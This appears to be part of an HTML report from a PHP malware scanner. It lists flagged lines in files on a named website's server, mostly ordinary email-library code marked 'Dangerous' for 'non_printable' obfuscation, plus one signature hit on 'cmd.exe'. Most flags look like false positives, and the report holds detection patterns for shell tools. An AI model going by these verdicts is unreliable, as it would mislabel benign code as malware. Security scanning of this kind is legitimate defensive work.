</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_125").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/mwkyk.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 161.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 18:34:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 18:34:28</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 285</span><br><table id="file_126" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1429</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
